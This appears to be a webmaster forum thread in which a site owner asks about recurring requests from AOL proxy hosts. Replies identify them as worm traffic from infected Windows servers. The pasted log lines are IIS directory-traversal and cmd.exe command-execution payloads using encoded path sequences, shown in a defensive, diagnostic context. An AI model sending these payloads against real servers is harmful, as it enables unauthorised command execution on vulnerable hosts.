Forum Moderators: DixonJones
cache-dl01.proxy.aol.com
cache-dl10.proxy.aol.com
What is this? Is it a spider or what? It's like clockwork. Something like this happens each month. Any ideas?
there was a similar thread lately but i can't find it now, however,
i don't think it's a spider.
maybe the cache-backbone of aol for some part of the net has a malconfigured
timeswitch
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 151
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 151
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
"GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 289
"GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
"GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 151
Hmm... I am not on a Windows server, what if I was?
Those requests come from windows servers infected with a worm trying to spread. If you want to get rid of them I suggest you this thread.
[webmasterworld.com...]
--
Phil
I forgot to mention that since your not hosted on a windows server, you wont get affected otherwise than having your logs cluttered with this junk.
